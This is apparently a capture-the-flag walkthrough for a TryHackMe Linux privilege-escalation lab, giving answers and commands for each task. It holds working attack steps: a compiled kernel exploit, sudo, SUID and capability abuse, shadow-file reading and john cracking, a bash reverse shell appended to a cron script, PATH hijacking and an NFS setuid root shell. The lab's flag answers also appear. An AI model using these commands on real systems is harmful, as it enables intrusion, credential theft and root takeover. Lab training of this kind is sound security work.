Linux Privilege Escalation
Room Link: https://tryhackme.com/room/linprivesc
Enumeration
What is the hostname of the target system?
Victim
hostname
What is the Linux kernel version of the target system?
Victim
uname -a
What Linux is this?
Victim
cat /etc/issue
What version of the Python language is installed on the system?
Victim
python -V
What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
CVE-2015-1328
Privilege Escalation: Kernel Exploits
Victim
uname -a
Kali
wget https://www.exploit-db.com/raw/37292 -O 37292.c
python2 -m SimpleHTTPServer 81Victim
cd /tmp
wget http://$KALI:81/37292.c
gcc 37292.c -o exploit
chmod +x exploit
./exploit
whoami
Privilege Escalation: Sudo
How many programs can the user "karen" run on the target system with sudo rights?
Victim
sudo -l
What is the content of the flag2.txt file?
Victim
sudo find / -name "flag2.txt"
cat /home/ubuntu/flag2.txt
How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
Victim
sudo nmap --interactiveWhat is the hash of frank's password?
Victim
sudo nano /etc/shadowPrivilege Escalation: SUID
Victim
find / -type f -perm -04000 -ls 2>/dev/null
Which user shares the name of a great comic book writer?
Victim
cat /etc/passwd
What is the password of user2?
Since base64 was in the list we can read the contents of shadow and passwd with it. Once outputted save the results on Kali.
Victim
base64 /etc/shadow | base64 --decode
base64 /etc/passwd | base64 --decode
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
What is the content of the flag3.txt file?
Victim
find / -name "flag3.txt" 2>/dev/null
base64 /home/ubuntu/flag3.txt | base64 --decode
Privilege Escalation: Capabilities
How many binaries have set capabilities?
Victim
getcap -r / 2>/dev/null
What is the content of the flag4.txt file?
Victim
/home/karen/vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Victim
find / -name "flag4.txt" 2>/dev/null
cat /home/ubuntu/flag4.txtPrivilege Escalation: Cron Jobs
How many user-defined cron jobs can you see on the target system?
Victim
cat /etc/crontab
Victim
ls -lah /home/karen/backup.sh
cat /home/karen/backup.sh
Kali
nc -lvnp 4444Victim
chmod +x /home/karen/backup.sh
echo "bash -i >& /dev/tcp/10.10.19.80/4444 0>&1" >> /home/karen/backup.sh
What is Matt's password?
Cat files and copy over to Kali.
Victim
cat /etc/passwd
cat /etc/shadowKali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Privilege Escalation: PATH
What is the odd folder you have write access for?
Victim
find / -writable 2>/dev/null
Exploit the $PATH vulnerability to read the content of the flag6.txt file
Victim
cd /home/murdoch
export PATH=/home/murdoch:$PATH
echo "/bin/bash" > thm
chmod 777 thm
./testPrivilege Escalation: NFS
Victim
showmount -e 10.10.216.254
cat /etc/exports
Kali
mkdir /root/attack
mount -o rw 10.10.216.254:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.cnfc.c
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}Kali
gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfcVictim
cd /home/ubuntu/sharedfolder
./nfc
Capstone Challenge
Victim
base64 /etc/shadow | base64 --decode
base64 /etc/passwd | base64 --decodeKali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Victim
su missy
Password: Password1Victim
sudo find . -exec /bin/sh ; -quit
whoami
Last updated